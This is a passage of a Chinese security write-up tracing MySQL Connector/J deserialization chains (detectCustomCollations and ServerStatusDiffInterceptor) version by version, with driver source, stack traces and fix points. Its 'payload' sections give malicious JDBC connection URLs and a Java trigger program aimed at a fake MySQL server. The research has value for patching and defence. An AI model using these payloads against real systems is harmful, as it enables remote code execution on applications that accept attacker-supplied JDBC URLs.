sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)<br>at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)<br>at java.lang.reflect.Constructor.newInstance(Constructor.java:422)<br>at com.mysql.jdbc.Util.handleNewInstance(Util.java:411)<br>at com.mysql.jdbc.ConnectionImpl.getInstance(ConnectionImpl.java:416)<br>at com.mysql.jdbc.NonRegisteringDriver.connect(NonRegisteringDriver.java:347)<br>at java.sql.DriverManager.getConnection(DriverManager.java:664)<br>at java.sql.DriverManager.getConnection(DriverManager.java:270)<br>at Main.main(Main.java:12)<br></code></pre></td></tr></table></figure>

<h3 id=""><a href="#" class="headerlink" title="&lt;&#x3D;5.1.18"></a>&lt;&#x3D;5.1.18</h3><p>5.1.18及以下未使用Util.resultSetToMap，此链不存在反序列化漏洞。</p>
<p><code>com.mysql.jdbc.ConnectionImpl#buildCollationMapping()</code>方法（mysql-connector-java 5.1.18）</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">private</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">buildCollationMapping</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> SQLException &#123;<br>    <span class="hljs-keyword">if</span> (<span class="hljs-built_in">this</span>.versionMeetsMinimum(<span class="hljs-number">4</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>)) &#123;<br>        <span class="hljs-type">TreeMap</span> <span class="hljs-variable">sortedCollationMap</span> <span class="hljs-operator">=</span> <span class="hljs-literal">null</span>;<br>        <span class="hljs-keyword">if</span> (<span class="hljs-built_in">this</span>.getCacheServerConfiguration()) &#123;<br>            <span class="hljs-keyword">synchronized</span>(serverConfigByUrl) &#123;<br>                sortedCollationMap = (TreeMap)serverCollationByUrl.get(<span class="hljs-built_in">this</span>.getURL());<br>            &#125;<br>        &#125;<br><br>        <span class="hljs-type">Statement</span> <span class="hljs-variable">stmt</span> <span class="hljs-operator">=</span> <span class="hljs-literal">null</span>;<br>        <span class="hljs-type">ResultSet</span> <span class="hljs-variable">results</span> <span class="hljs-operator">=</span> <span class="hljs-literal">null</span>;<br><br>        <span class="hljs-keyword">try</span> &#123;<br>            <span class="hljs-keyword">if</span> (sortedCollationMap == <span class="hljs-literal">null</span>) &#123;<br>                sortedCollationMap = <span class="hljs-keyword">new</span> <span class="hljs-title class_">TreeMap</span>();<br>                stmt = <span class="hljs-built_in">this</span>.getMetadataSafeStatement();<br>                results = stmt.executeQuery(<span class="hljs-string">&quot;SHOW COLLATION&quot;</span>);<br><br>                <span class="hljs-keyword">while</span>(results.next()) &#123;<br>                    <span class="hljs-type">String</span> <span class="hljs-variable">charsetName</span> <span class="hljs-operator">=</span> results.getString(<span class="hljs-number">2</span>);<br>                    <span class="hljs-type">Integer</span> <span class="hljs-variable">charsetIndex</span> <span class="hljs-operator">=</span> results.getInt(<span class="hljs-number">3</span>);<br>                    sortedCollationMap.put(charsetIndex, charsetName);<br>                &#125;<br><br>                <span class="hljs-keyword">if</span> (<span class="hljs-built_in">this</span>.getCacheServerConfiguration()) &#123;<br>                    <span class="hljs-keyword">synchronized</span>(serverConfigByUrl) &#123;<br>                        serverCollationByUrl.put(<span class="hljs-built_in">this</span>.getURL(), sortedCollationMap);<br>                    &#125;<br>                &#125;<br>            &#125;<br><br>            <span class="hljs-type">int</span> <span class="hljs-variable">highestIndex</span> <span class="hljs-operator">=</span> (Integer)sortedCollationMap.lastKey();<br>            <span class="hljs-keyword">if</span> (CharsetMapping.INDEX_TO_CHARSET.length &gt; highestIndex) &#123;<br>                highestIndex = CharsetMapping.INDEX_TO_CHARSET.length;<br>            &#125;<br><br>            <span class="hljs-built_in">this</span>.indexToCharsetMapping = <span class="hljs-keyword">new</span> <span class="hljs-title class_">String</span>[highestIndex + <span class="hljs-number">1</span>];<br><br>            <span class="hljs-keyword">for</span>(<span class="hljs-type">int</span> <span class="hljs-variable">i</span> <span class="hljs-operator">=</span> <span class="hljs-number">0</span>; i &lt; CharsetMapping.INDEX_TO_CHARSET.length; ++i) &#123;<br>                <span class="hljs-built_in">this</span>.indexToCharsetMapping[i] = CharsetMapping.INDEX_TO_CHARSET[i];<br>            &#125;<br><br>            <span class="hljs-keyword">for</span>(Map.Entry indexEntry : sortedCollationMap.entrySet()) &#123;<br>                <span class="hljs-type">String</span> <span class="hljs-variable">mysqlCharsetName</span> <span class="hljs-operator">=</span> (String)indexEntry.getValue();<br>                <span class="hljs-built_in">this</span>.indexToCharsetMapping[(Integer)indexEntry.getKey()] = CharsetMapping.getJavaEncodingForMysqlEncoding(mysqlCharsetName, <span class="hljs-built_in">this</span>);<br>            &#125;<br>        &#125; <span class="hljs-keyword">catch</span> (SQLException e) &#123;<br>            <span class="hljs-keyword">throw</span> e;<br>        &#125; <span class="hljs-keyword">finally</span> &#123;<br>            <span class="hljs-keyword">if</span> (results != <span class="hljs-literal">null</span>) &#123;<br>                <span class="hljs-keyword">try</span> &#123;<br>                    results.close();<br>                &#125; <span class="hljs-keyword">catch</span> (SQLException var20) &#123;<br>                &#125;<br>            &#125;<br><br>            <span class="hljs-keyword">if</span> (stmt != <span class="hljs-literal">null</span>) &#123;<br>                <span class="hljs-keyword">try</span> &#123;<br>                    stmt.close();<br>                &#125; <span class="hljs-keyword">catch</span> (SQLException var19) &#123;<br>                &#125;<br>            &#125;<br><br>        &#125;<br>    &#125; <span class="hljs-keyword">else</span> &#123;<br>        <span class="hljs-built_in">this</span>.indexToCharsetMapping = CharsetMapping.INDEX_TO_CHARSET;<br>    &#125;<br><br>&#125;<br></code></pre></td></tr></table></figure>

<h3 id="5-1-29-5-1-40"><a href="#5-1-29-5-1-40" class="headerlink" title="5.1.29-5.1.40"></a>5.1.29-5.1.40</h3><p><code>com.mysql.jdbc.ConnectionImpl#buildCollationMapping()</code>方法（mysql-connector-java 5.1.40）</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768371820010-9bb30e96-9060-4503-9b21-5126b6c47f08.png" srcset="/img/loading.gif" lazyload></p>
<p>这里判断服务版本大于4.1.0且detectCustomCollations为true则进入，其他都没变化，只是在构造jdbc链接的时候要多加一个<code>detectCustomCollations=true</code></p>
<h4 id="payload-1"><a href="#payload-1" class="headerlink" title="payload"></a>payload</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">jdbc:mysql://127.0.0.1:3308/test?detectCustomCollations=true&amp;autoDeserialize=true&amp;user=d5fadd4<br></code></pre></td></tr></table></figure>

<h3 id="5-1-41-5-1-48"><a href="#5-1-41-5-1-48" class="headerlink" title="5.1.41-5.1.48"></a>5.1.41-5.1.48</h3><p><code>com.mysql.jdbc.ConnectionImpl#buildCollationMapping()</code>方法（mysql-connector-java 5.1.48）</p>
<p>5.1.41版本后，不再使用<code>com.mysql.jdbc.Util#resultSetToMap()</code>方法获取”SHOW COLLATION”的结果，但又直接调用了<code>results.getObject(3)</code></p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768372140670-c101ae38-8f39-4bb5-a0f2-f61f46b3653a.png" srcset="/img/loading.gif" lazyload></p>
<p>调用至<code>com.mysql.jdbc.ResultSetImpl#getObject()</code>方法（mysql-connector-java 5.1.48）</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768372525622-d29546ef-e410-44ac-af32-9852bfa93926.png" srcset="/img/loading.gif" lazyload></p>
<p>这里固定会进入<code>getObjectDeserializingIfNeeded</code>方法：</p>
<p>这里就跟之前的流程差不多了</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768372621893-8332e3a6-d307-4de8-a465-86fc248fa4c8.png" srcset="/img/loading.gif" lazyload></p>
<h4 id="payload-2"><a href="#payload-2" class="headerlink" title="payload"></a>payload</h4><p>注意：这里由于java web chains不能手动设置序列化payload的列，所以无法成功触发， 可以用MySQL_Fake_Server代替。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">jdbc:mysql://127.0.0.1:3308/test?detectCustomCollations=true&amp;autoDeserialize=true&amp;user=d5fadd4<br></code></pre></td></tr></table></figure>

<h3 id="5-1-49"><a href="#5-1-49" class="headerlink" title="5.1.49"></a>5.1.49</h3><p><code>com.mysql.jdbc.ConnectionImpl#buildCollationMapping()</code>方法（mysql-connector-java 5.1.49）</p>
<p>5.1.49版本不再调用results.getObject()，此利用链失效。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">private</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">buildCollationMapping</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> SQLException &#123;<br>    ...<br>    <span class="hljs-keyword">if</span> (customCharset == <span class="hljs-literal">null</span> &amp;&amp; <span class="hljs-built_in">this</span>.getDetectCustomCollations() &amp;&amp; <span class="hljs-built_in">this</span>.versionMeetsMinimum(<span class="hljs-number">4</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>)) &#123;<br>    java.sql.<span class="hljs-type">Statement</span> <span class="hljs-variable">stmt</span> <span class="hljs-operator">=</span> <span class="hljs-literal">null</span>;<br>    <span class="hljs-type">ResultSet</span> <span class="hljs-variable">results</span> <span class="hljs-operator">=</span> <span class="hljs-literal">null</span>;<br><br>    <span class="hljs-keyword">try</span> &#123;<br>        customCharset = <span class="hljs-keyword">new</span> <span class="hljs-title class_">HashMap</span>();<br>        customMblen = <span class="hljs-keyword">new</span> <span class="hljs-title class_">HashMap</span>();<br>        stmt = <span class="hljs-built_in">this</span>.getMetadataSafeStatement();<br><br>        <span class="hljs-keyword">try</span> &#123;<br>            results = stmt.executeQuery(<span class="hljs-string">&quot;SHOW COLLATION&quot;</span>);<br><br>            <span class="hljs-keyword">while</span>(results.next()) &#123;<br>                <span class="hljs-comment">//不再调用getObject()</span><br>                <span class="hljs-type">int</span> <span class="hljs-variable">collationIndex</span> <span class="hljs-operator">=</span> results.getInt(<span class="hljs-number">3</span>);<br>                <span class="hljs-type">String</span> <span class="hljs-variable">charsetName</span> <span class="hljs-operator">=</span> results.getString(<span class="hljs-number">2</span>);<br>                <span class="hljs-keyword">if</span> (collationIndex &gt;= <span class="hljs-number">2048</span> || !charsetName.equals(CharsetMapping.getMysqlCharsetNameForCollationIndex(collationIndex))) &#123;<br>                    ((Map)customCharset).put(collationIndex, charsetName);<br>                &#125;<br><br>                <span class="hljs-keyword">if</span> (!CharsetMapping.CHARSET_NAME_TO_CHARSET.containsKey(charsetName)) &#123;<br>                    ((Map)customMblen).put(charsetName, (Object)<span class="hljs-literal">null</span>);<br>                &#125;<br>            &#125;<br>            ...<br></code></pre></td></tr></table></figure>

<h3 id="6-0-0-6-0-6"><a href="#6-0-0-6-0-6" class="headerlink" title="6.0.0-6.0.6"></a>6.0.0-6.0.6</h3><p><code>com.mysql.cj.jdbc.ConnectionImpl#buildCollationMapping()</code>方法（mysql-connector-java 6.0.6）</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768373552742-8d154b39-b646-4ea6-babc-a5ac2f413eae.png" srcset="/img/loading.gif" lazyload></p>
<p>这里还是调用了<code>com.mysql.cj.jdbc.util.ResultSetUtil.resultSetToMap()</code></p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768373580175-d81fddfa-7891-4e2f-b8c0-c901f88f8c62.png" srcset="/img/loading.gif" lazyload></p>
<p>调用<code>getObject()</code>，最后调用至<code>readObject()</code></p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768373675613-eb9fda5b-67d8-4b2e-9adb-9c51a0c4f00a.png" srcset="/img/loading.gif" lazyload></p>
<h4 id="payload-3"><a href="#payload-3" class="headerlink" title="payload"></a>payload</h4><p>由于6.0.1和6.0.0的源码和jar无法从maven下载，无法实验，但是可以通过从github下载源码审计知道是同样的payload。<a target="_blank" rel="noopener" href="https://github.com/mysql/mysql-connector-j/releases/tag/6.0.0">https://github.com/mysql/mysql-connector-j/releases/tag/6.0.0</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">jdbc:mysql://127.0.0.1:3308/test?detectCustomCollations=true&amp;autoDeserialize=true&amp;user=d5fadd4<br></code></pre></td></tr></table></figure>

<h3 id="8-x-x"><a href="#8-x-x" class="headerlink" title="8.x.x"></a>8.x.x</h3><p>mysql-connector-java 8.0以上不再使用<code>resultSetToMap()</code>方法，也就不再调用<code>getObject()</code>方法，此链失效。</p>
<p><code>com.mysql.cj.jdbc.ConnectionImpl#buildCollationMapping()</code>方法：</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768374110609-5ea93473-3933-4608-bc5e-a4c8a20ad54f.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="ServerStatusDiffInterceptor链-1"><a href="#ServerStatusDiffInterceptor链-1" class="headerlink" title="ServerStatusDiffInterceptor链"></a>ServerStatusDiffInterceptor链</h2><h3 id="5-1-0-5-1-10（主要分析）"><a href="#5-1-0-5-1-10（主要分析）" class="headerlink" title="5.1.0-5.1.10（主要分析）"></a>5.1.0-5.1.10（主要分析）</h3><h4 id="payload-4"><a href="#payload-4" class="headerlink" title="payload"></a>payload</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">import</span> java.sql.Connection;<br><span class="hljs-keyword">import</span> java.sql.DriverManager;<br><span class="hljs-keyword">import</span> java.sql.PreparedStatement;<br><span class="hljs-keyword">import</span> java.sql.ResultSet;<br><br><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Main</span> &#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> Exception &#123;<br>        <span class="hljs-comment">//加载驱动</span><br>        Class.forName(<span class="hljs-string">&quot;com.mysql.jdbc.Driver&quot;</span>);<br>        <span class="hljs-comment">//用户连接信息</span><br>        <span class="hljs-type">String</span> <span class="hljs-variable">url</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;jdbc:mysql://127.0.0.1:3308/test?autoDeserialize=true&amp;statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&amp;user=d5fadd4&quot;</span>;<br>        <span class="hljs-comment">//连接数据库</span><br>        <span class="hljs-type">Connection</span> <span class="hljs-variable">connection</span> <span class="hljs-operator">=</span> DriverManager.getConnection(url);<br><br>        <span class="hljs-comment">//需要进行查询</span><br>        <span class="hljs-type">String</span> <span class="hljs-variable">sql</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;select database()&quot;</span>;<br>        <span class="hljs-type">PreparedStatement</span> <span class="hljs-variable">ps</span> <span class="hljs-operator">=</span> connection.prepareStatement(sql);<br>        <span class="hljs-comment">//执行查询操作，返回的是数据库结果集的数据表</span><br>        <span class="hljs-type">ResultSet</span> <span class="hljs-variable">resultSet</span> <span class="hljs-operator">=</span> ps.executeQuery();<br>        connection.close();<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768374585057-f7918cc9-d00f-4a8f-9fb1-1398b3546da5.png" srcset="/img/loading.gif" lazyload></p>
<h4 id="前置分析"><a href="#前置分析" class="headerlink" title="前置分析"></a>前置分析</h4><p>可以看到jdbc参数中多了一个<code>statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor</code>，这里最重点和最巧妙的就是这个参数。它允许你指定一个或多个实现了 <code>com.mysql.interceptors.StatementInterceptor</code>接口的类。这些类的目的是在执行 SQL 查询前后进行拦截和操纵，你完全可以理解为：只要JDBC带上了这个，在执行SQL语句前和后就会有一层类似的Filter，默认调用其预处理<code>preProcess</code> 和后处理<code>postProcess</code>等方法。</p>
<p>那我们来直接看一下<code>com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor</code>类的<code>preProcess</code>方法：</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768375536218-8884cd08-653b-4567-8609-4bf9f1cfe765.png" srcset="/img/loading.gif" lazyload></p>
<p>服务器版本大于5.0.2可以进入，跟进<code>populateMapWithSessionStatusValues</code>方法：</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768375566950-92c0c02b-d9d6-4295-b837-24573fbf92ec.png" srcset="/img/loading.gif" lazyload></p>
<p>到了这里，代码就会去执行另一条语句： <code>SHOW SESSION STATUS</code>，然后把结果放入经典的<code>Util.resultSetToMap</code>方法，后面就是同样的<code>getObject</code>到<code>readObject</code>了。</p>
<h4 id="详细分析"><a href="#详细分析" class="headerlink" title="详细分析"></a>详细分析</h4><p>此链与detectCustomCollations链一直到<code>com.mysql.jdbc.JDBC4Connection</code>构造方法的部分都是同样的，不一样的地方是从其父类 ConnectionImpl 的构造方法开始：</p>
<p><code>com.mysql.jdbc.ConnectionImpl</code> 构造方法（mysql-connector-java 5.1.10）</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768374939881-70349b99-0708-47a5-b3a1-2ce2fefb3b36.png" srcset="/img/loading.gif" lazyload></p>
<p>跟进<code>com.mysql.jdbc.ConnectionImpl#initializeStatementInterceptors()</code>方法，此方法解析连接参数中 statementInterceptors 的值，并添加相应类至当前对象statementInterceptors属性中。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">protected</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">initializeStatementInterceptors</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> SQLException &#123;<br>    <span class="hljs-built_in">this</span>.statementInterceptors = Util.loadExtensions(<span class="hljs-built_in">this</span>, <span class="hljs-built_in">this</span>.props, <span class="hljs-built_in">this</span>.getStatementInterceptors(), <span class="hljs-string">&quot;MysqlIo.BadStatementInterceptor&quot;</span>, <span class="hljs-built_in">this</span>.getExceptionInterceptor());<br>&#125;<br></code></pre></td></tr></table></figure>

<p>设置完毕属性后，退出到main.java，继续执行正常查询<code>PreparedStatement ps = connection.prepareStatement(sql);</code>执行完成后获取结果，执行<code>java.sql.PreparedStatement#executeQuery()</code>-&gt;<code>java.sql.PreparedStatement#executeInternal()</code>-&gt;<code>com.mysql.jdbc.ConnectionImpl#execSQL()</code>-&gt;<code>com.mysql.jdbc.ConnectionImpl#sqlQueryDirect()</code>-&gt;<code>com.mysql.jdbc.ConnectionImpl#invokeStatementInterceptorsPre()</code>，到这个方法后，代码会去遍历我们刚刚设置的拦截器，然后调用其中的<code>preProcess</code>方法，后面发生的事情就都知道了。</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768375941150-c6dc5dc5-e8a1-47e9-bb0a-7156b7ff1a34.png" srcset="/img/loading.gif" lazyload></p>
<p>查询部分整个堆栈：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs java">at com.mysql.jdbc.ResultSetImpl.getObject(ResultSetImpl.java:<span class="hljs-number">4924</span>)<br>at com.mysql.jdbc.Util.resultSetToMap(Util.java:<span class="hljs-number">494</span>)<br>at com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor.populateMapWithSessionStatusValues(ServerStatusDiffInterceptor.java:<span class="hljs-number">75</span>)<br>at com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor.preProcess(ServerStatusDiffInterceptor.java:<span class="hljs-number">92</span>)<br>at com.mysql.jdbc.MysqlIO.invokeStatementInterceptorsPre(MysqlIO.java:<span class="hljs-number">2333</span>)<br>at com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:<span class="hljs-number">2009</span>)<br>at com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:<span class="hljs-number">2648</span>)<br>at com.mysql.jdbc.PreparedStatement.executeInternal(PreparedStatement.java:<span class="hljs-number">2077</span>)<br>at com.mysql.jdbc.PreparedStatement.executeQuery(PreparedStatement.java:<span class="hljs-number">2228</span>)<br>at Main.main(Main.java:<span class="hljs-number">19</span>)<br></code></pre></td></tr></table></figure>

<h3 id="5-1-11-5-1-48"><a href="#5-1-11-5-1-48" class="headerlink" title="5.1.11-5.1.48"></a>5.1.11-5.1.48</h3><p>还是到<code>com.mysql.jdbc.ConnectionImpl</code>构造方法（mysql-connector-java 5.1.48）</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768376745773-3ae83ad2-10a3-4531-90d6-e1b57d7aef87.png" srcset="/img/loading.gif" lazyload></p>
<p>还是在<code>com.mysql.jdbc.ConnectionImpl#initializeSafeStatementInterceptors()</code>中解析连接参数中statementInterceptors 参数并添加相应类至当前对象 statementInterceptors 属性。</p>
<p>然后跟前面一样<code>com.mysql.jdbc.ConnectionImpl#createNewIO()</code>-&gt;<code>com.mysql.jdbc.ConnectionImpl#connectOneTryOnly()</code>-&gt;<code>com.mysql.jdbc.ConnectionImpl#initializePropsFromServer()</code></p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768377374290-04a7577f-ef05-404b-891e-8991725dc343.png" srcset="/img/loading.gif" lazyload></p>
<p>但是后面不是调用 <code>buildCollationMapping</code> 方法了，而是调用 <code>loadServerVariables</code> 方法：</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768377476438-fcc6b286-2afc-418f-959b-b2ca3cfc9cc5.png" srcset="/img/loading.gif" lazyload></p>
<p>在这个方法里，代码自动进行了查询。又因为我们设置了拦截器，一旦进行查询，就会走到<code>com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor#preProcess()</code>方法，然后进行反序列化。</p>
<p>整个堆栈：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs plain">at com.mysql.jdbc.ResultSetImpl.getObjectDeserializingIfNeeded(ResultSetImpl.java:4563)<br>at com.mysql.jdbc.ResultSetImpl.getObject(ResultSetImpl.java:4528)<br>at com.mysql.jdbc.Util.resultSetToMap(Util.java:467)<br>at com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor.populateMapWithSessionStatusValues(ServerStatusDiffInterceptor.java:69)<br>at com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor.preProcess(ServerStatusDiffInterceptor.java:84)<br>at com.mysql.jdbc.V1toV2StatementInterceptorAdapter.preProcess(V1toV2StatementInterceptorAdapter.java:54)<br>at com.mysql.jdbc.NoSubInterceptorWrapper.preProcess(NoSubInterceptorWrapper.java:65)<br>at com.mysql.jdbc.MysqlIO.invokeStatementInterceptorsPre(MysqlIO.java:2824)<br>at com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:2580)<br>at com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:2465)<br>at com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:2439)<br>at com.mysql.jdbc.StatementImpl.executeQuery(StatementImpl.java:1365)<br>at com.mysql.jdbc.ConnectionImpl.loadServerVariables(ConnectionImpl.java:3775)<br>at com.mysql.jdbc.ConnectionImpl.initializePropsFromServer(ConnectionImpl.java:3196)<br>at com.mysql.jdbc.ConnectionImpl.connectOneTryOnly(ConnectionImpl.java:2233)<br>at com.mysql.jdbc.ConnectionImpl.createNewIO(ConnectionImpl.java:2015)<br>at com.mysql.jdbc.ConnectionImpl.&lt;init&gt;(ConnectionImpl.java:768)<br>at com.mysql.jdbc.JDBC4Connection.&lt;init&gt;(JDBC4Connection.java:47)<br>at sun.reflect.NativeConstructorAccessorImpl.newInstance0(NativeConstructorAccessorImpl.java:-1)<br>at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)<br>at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)<br>at java.lang.reflect.Constructor.newInstance(Constructor.java:422)<br>at com.mysql.jdbc.Util.handleNewInstance(Util.java:425)<br>at com.mysql.jdbc.ConnectionImpl.getInstance(ConnectionImpl.java:385)<br>at com.mysql.jdbc.NonRegisteringDriver.connect(NonRegisteringDriver.java:323)<br>at java.sql.DriverManager.getConnection(DriverManager.java:664)<br>at java.sql.DriverManager.getConnection(DriverManager.java:270)<br>at Main.main(Main.java:12)<br></code></pre></td></tr></table></figure>

<h4 id="payload-5"><a href="#payload-5" class="headerlink" title="payload"></a>payload</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">jdbc:mysql://127.0.0.1:3308/test?autoDeserialize=true&amp;statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&amp;user=d5fadd4<br></code></pre></td></tr></table></figure>

<h3 id="5-1-49-1"><a href="#5-1-49-1" class="headerlink" title="5.1.49"></a>5.1.49</h3><p>5.1.46的<code>com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor</code>类的<code>populateMapWithSessionStatusValues</code>方法，取消使用<code>getObject</code>，改用<code>getSting</code>，无法触发反序列化。</p>
<p><img src="/img/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1768378460257-f9e6e80f-48b8-4f96-91a9-9c89c48f295d.png" srcset="/img/loading.gif" lazyload></p>
